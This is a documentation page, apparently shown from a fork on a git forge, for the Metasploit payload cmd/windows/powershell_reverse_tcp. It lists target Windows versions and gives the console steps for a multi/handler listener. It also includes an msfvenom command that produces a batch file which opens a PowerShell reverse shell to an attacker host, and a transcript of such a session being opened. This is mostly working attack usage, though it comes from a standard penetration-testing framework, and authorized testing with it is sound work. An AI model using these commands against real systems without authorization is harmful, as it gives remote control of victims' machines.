adam/metasploit-gs
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity
Files
6d9d9a70d410cc94de4d3d9afd7a75cd426d43be
metasploit-gs/documentation/modules/payload/singles/cmd/windows/powershell_reverse_tcp.md
T
cgranleese-r7 469f102596 Updates docs to reflect new default prompt
2025-07-17 09:53:40 +01:00

1.3 KiB
Raw Blame History

Vulnerable Application

This powershell payload is suitable for the following environments:

  • Windows 7
  • Windows Server 2012
  • Windows 10

Verification Steps

  1. Do: use exploit/multi/handler
  2. Do: set payload cmd/windows/powershell_reverse_tcp
  3. Do: set LHOST [IP]
  4. Do: set LPORT [PORT]
  5. Do: run

Scenarios

Generating a batch file with msfvenom

msfvenom -p cmd/windows/powershell_reverse_tcp LHOST=192.168.0.2 LPORT=4444 -o powershell_reverse_tcp.bat

The output batch file can be executed directly on the target, or pasted as a command.

Example usage on Windows 7 target

msf > use exploit/multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf exploit(multi/handler) > set payload cmd/windows/powershell_reverse_tcp
payload => cmd/windows/powershell_reverse_tcp
msf exploit(multi/handler) > set LHOST 192.168.0.2
LHOST => 192.168.0.2
msf exploit(multi/handler) > set LPORT 4444
LPORT => 4444
msf exploit(multi/handler) > run

[*] Started reverse TCP handler on 192.168.0.2:4444
[*] Powershell session session 1 opened (192.168.0.2:4444 -> 192.168.0.2:49106 ) at 2021-11-02 12:28:28 +0000

User @ USER-PC
PS C:\Users\User> exit
[*] 192.168.0.2 - Powershell session session 1 closed.

Options

LOAD_MODULES

A list of powershell modules (separated by a commas) to download.

Reference in New Issue View Git Blame Copy Permalink